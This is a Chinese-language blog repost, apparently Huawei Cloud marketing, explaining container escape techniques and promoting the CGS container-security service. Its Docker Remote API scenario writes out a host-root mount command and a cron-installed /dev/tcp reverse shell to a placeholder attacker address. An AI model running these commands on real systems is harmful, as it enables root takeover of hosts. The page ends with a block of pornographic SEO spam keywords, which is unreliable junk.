原生2.0時代,企業都應該了解的容器安全

      網友投稿 632 2025-04-03

      隨著云原生技術的成熟和市場需求的升級,云計算的發展已步入新的階段,云原生2.0時代已經到來。從技術角度看,以容器、微服務以及動態編排為代表的云原生技術蓬勃發展,成為賦能業務創新的重要推動力,并已經應用到企業核心業務。從市場角度看,云原生技術已在金融、制造、互聯網等多個行業得到廣泛驗證,支持的業務場景也愈加豐富,行業生態日漸繁榮。云原生2.0是企業智能升級的新階段,企業云化從“ON Cloud”走向“IN Cloud”,新生能力與既有能力有機協同、立而不破,實現資源高效、應用敏捷、業務智能、安全可信,成為“新云原生企業”。

      云原生2.0時代,任何企業都可以成為“新云原生企業”,作為云原生的代表技術之一的容器,每個企業都應該對容器安全有所了解。

      傳統的虛擬機能夠基于虛擬化技術更加有效的利用硬件計算資源,可以實現云租戶的隔離與資源共享。相比虛擬機來說,容器更輕、更快,但是作為一種新技術,容器的安全防護也與虛擬機所有不同。

      一、容器 VS 虛擬機

      容器與虛擬機具有相似的資源隔離和分配價值,但容器的作用不同,因為容器是虛擬化操作系統而不是硬件。容器更便攜,更高效。

      容器VS虛擬機

      虛擬機(VM)是對物理硬件的抽象,將一臺服務器轉化為多臺服務器。Hypervisor允許在一臺機器上運行多個虛擬機。每個虛擬機都包含操作系統、應用程序、必要的二進制文件和庫的完整副本,占用數十GB的空間。虛擬機啟動速度也比較慢。

      容器是應用程序層的一個抽象,將代碼和依賴打包在一起。多個容器可以運行在同一臺機器上,與其他容器共享操作系統內核,每個容器在用戶空間中作為隔離的進程運行。容器比虛擬機占用更少的空間(容器鏡像通常只有幾十MB大小),可以處理更多的應用程序。

      二、容器逃逸

      容器逃逸,是容器技術啟用以來一直被關注的問題,甚至被認為是容器的首要安全問題。所謂“逃逸”,指的是“流氓”容器/虛擬機嘗試突破隔離環境的限制,訪問宿主系統或者在同一個系統上的同駐容器或虛擬機。從而造成敏感信息泄露,或者系統及服務發生DOS的行為。

      但正是由于容器與宿主系統共享內核,因此容器與宿主機有著更大的接觸面,隔離層次更少,更容易從容器內實施逃逸攻擊。因此,如何解決容器逃逸安全風險,避免容器逃逸攻擊帶來的損失是容器安全中最為重要的一個問題。

      三、容器逃逸常用手段

      1)通過容器自身漏洞及內核漏洞逃逸

      攻擊的主要途徑之一就是利用漏洞,通過程序設計或實現的缺陷來執行非法操作,容器逃逸也不例外。容器自身漏洞是其利用進行逃逸的路徑之一,同時由于容器共享宿主系統內核,因此內核漏洞是其逃逸的另一路徑,同時由于內核漏洞的數量遠遠大于容器自身漏洞,因此內核漏洞甚至成為容器逃逸更為主要的一個手段。

      1.1 利用容器漏洞逃逸 – shocker攻擊

      Shocker攻擊是容器逃逸最著名的案例,其本質是利用了一個不常用的系統調用open_by_handle_at,同時借助docker1.0前版本并未限制CAP_DAC_READ_SEARCH能力,并將容器啟動時會掛載宿主機文件到容器內(如舊版本的/.dockerinit,新版本的/etc/hosts)作為起點,執行暴力破解攻擊,最終獲取到要訪問的宿主系統文件的句柄信息并進行讀取,從而實現逃逸。

      Github地址:https://github.com/gabrtv/shocker

      容器執行shocker攻擊逃逸訪問宿主系統/etc/shadow文件:

      1.2 內核漏洞利用逃逸 – dirtycow攻擊

      DirtyCow(臟牛漏洞,CVE-2016-5195)是Linux內核中的一個權限提升漏洞,其也可被容器利用實施逃逸。容器利用dirtycow漏洞改寫虛擬動態共享庫VDSO(Virtual Dynamically Shared Objec),并將shellcode置入其中,當主機系統進程調用并執行修改后的內容時,就會借用此進程身份執行置入的shellcode,并最終在容器內獲得一個來自主機的root權限的shell。

      2)不安全配置引發逃逸

      2.1 不安全啟動,如privileged特權容器

      容器以--privileged參數啟動時稱為特權容器,特權容器顧名思義具有較高權限,包括對宿主機上的設備的訪問權限。因此,攻擊者可以直接在容器內mount主機設備并進行文件訪問,從而輕而易舉實現逃逸。

      2.2 不安全掛載,如掛載sock到容器

      圖片來源:https://medium.com/better-programming/about-var-run-docker-sock-3bfd276e12fd

      云原生2.0時代,企業都應該了解的容器安全

      Docker.sock文件是一個Unix domain socket文件,是Docker daemon默認監聽的套接字文件,docker client通過它與docker daemon進行通信。docker client將信息查詢和下發命令等請求通過docker.sock發給docker daemon,然后由deamon執行具體請求,包括鏡像查詢、容器創建等。

      將docker.sock掛載到容器內,可以在容器內繼續運行一個容器,實現docker in docker,并可在容器內容器啟動時通過-v參數將宿主機根目錄掛載到容器內,從而在容器內訪問宿主機文件,實現逃逸。

      2.3? Docker remote api未授權訪問

      默認情況下,docker daemon只允許通過unix domain socket – docker.sock進行本地通信操作,但除此之外,docker daemon也提供了Restful API供遠端client訪問(daemon通過-H參數指定監聽端口),如果未對訪問進行權限控制及合規性檢查,則攻擊者也可以訪問這個API執行高危操作,并實施逃逸攻擊。

      例如一種攻擊場景:

      (1)通過Remote API創建一個容器,并將宿主系統根目錄掛載到容器內:

      # docker -H tcp://$IP:$PORT run -it -v /:/mnt ubuntu /bin/bash

      其中:$IP表示docker daemon服務ip,$PORT表示Remote API監聽端口

      (2)將反彈shell命令寫入計劃任務文件

      # echo '* * * * * /bin/bash -i >& /dev/tcp/$IP/$PORT 0>&1' >> /mnt/var/spool/cron/crontabs/root

      其中:$IP表示攻擊端IP,$PROT表示攻擊端監聽端口

      (3)攻擊端監聽上一步中的$PORT端口,獲取來自對端(docker服務所在系統)的具有root權限得反彈shell,并任意訪問。

      四、華為云容器安全服務CGS之逃逸安全防護方案

      華為云容器安全服務CGS

      華為云容器安全服務CGS構建了容器安全威脅縱深防御體系,提供包括鏡像掃描、威脅檢測與威脅防護的一整套容器安全能力,提供針對容器的Build、Ship、Run全生命周期保護能力,滲透到整個容器DevOps流程,保證容器虛擬環境從開發到生產整個流程的安全。其中,容器逃逸檢測是CGS的核心功能之一,它通過如下手段構建系統化的容器逃逸全面防護能力:

      1)監控容器不安全配置啟動

      前文中提到,不安全配置是容器逃逸的一個重要原因。因此,監控容器的不安全啟動也是容器逃逸防護的一個重要手段。CGS可以針對容器啟動的各種不安全配置進行監控,包括啟動特權容器、掛載宿主機文件、安全策略關閉、特權端口映射等,從容器創建伊始就檢測逃逸風險,實現整體防護方案第一步。

      2)容器行為深度分析

      容器啟動后,CGS可對容器運行過程中的行為進行實時跟蹤和觀察,監控容器內的進程運行、文件訪問、網絡連接、系統調用等行為,并對行為進行深度分析,從行為過程體現出來的特征到行為所產生的結果進行全面分析檢測,有效發現容器已知和未知漏洞利用逃逸攻擊行為并進行告警。

      3)容器基線機器學習

      一般而言,容器的行為通常固定且純粹,比如一個提供web服務的容器內可能只會運行一個nginx進程,一個提供DB服務的容器內可能只會運行一個mysql進程,并且進程所執行的操作,包括文件訪問、系統調用、網絡連接等行為都有固定合理范圍,因此可以對容器圈定正常行為范圍,構建行為基線。CGS利用機器學習技術,從靜態和動態兩個維度分析容器正常行為并建立基線,使得基線模型更準確、更完整,然后根據基線跟蹤容器行為,感知基線以外的異常行為,實現對攻擊行為的全面感知,并有效提升對于容器利用0day漏洞進行逃逸攻擊的檢測能力。

      華為云CGS容器逃逸方案防護機制內置在防護平臺,無需用戶參與即可實現容器逃逸系統化檢測,具有良好的易用性,同時方案采用事件驅動機制實現性能高、反應快,為容器安全保駕護航。

      了解更多華為云容器安全服務,請點擊https://www.huaweicloud.com/product/cgs.html

      云安全 容器安全服務 通用安全

      版權聲明:本文內容由網絡用戶投稿,版權歸原作者所有,本站不擁有其著作權,亦不承擔相應法律責任。如果您發現本站中有涉嫌抄襲或描述失實的內容,請聯系我們jiasou666@gmail.com 處理,核實后本網站將在24小時內刪除侵權內容。

      版權聲明:本文內容由網絡用戶投稿,版權歸原作者所有,本站不擁有其著作權,亦不承擔相應法律責任。如果您發現本站中有涉嫌抄襲或描述失實的內容,請聯系我們jiasou666@gmail.com 處理,核實后本網站將在24小時內刪除侵權內容。

      上一篇:超鏈接如何指定sheet,這個知道指定到整個表格,(超鏈接到表格的某一位置)
      下一篇:wps office行間距距怎么調
      相關文章
      亚洲AV综合色区无码一区 | 亚洲毛片基地日韩毛片基地| 国产自偷亚洲精品页65页| 亚洲精品无码久久不卡| 亚洲AV无码国产剧情| 亚洲精品无码成人| 亚洲另类无码一区二区三区| 亚洲一卡2卡3卡4卡5卡6卡 | 久久狠狠爱亚洲综合影院| 亚洲av永久无码精品三区在线4| 亚洲国产成人精品电影| 亚洲AV无码一区二区三区人| 亚洲妇女熟BBW| 亚洲综合一区国产精品| 亚洲乱亚洲乱妇无码| 亚洲av综合日韩| 亚洲国产综合人成综合网站| 狠狠色婷婷狠狠狠亚洲综合| 国产亚洲AV手机在线观看| 亚洲精品亚洲人成在线观看| 亚洲AV永久无码精品成人| 少妇中文字幕乱码亚洲影视| 亚洲精品mv在线观看| 亚洲综合偷自成人网第页色| 亚洲国产精品成人AV在线 | 亚洲综合一区国产精品| 精品韩国亚洲av无码不卡区| 亚洲精品成人a在线观看| 亚洲色WWW成人永久网址| 亚洲Av永久无码精品三区在线| 久久久久亚洲AV无码观看| 亚洲av无码一区二区三区观看| 精品国产成人亚洲午夜福利| 国产精品亚洲精品日韩动图| 极品色天使在线婷婷天堂亚洲| 久久精品国产精品亚洲| 亚洲av无码不卡| 亚洲人成电影网站| 成a人片亚洲日本久久| 曰韩亚洲av人人夜夜澡人人爽| 亚洲AV无码AV男人的天堂|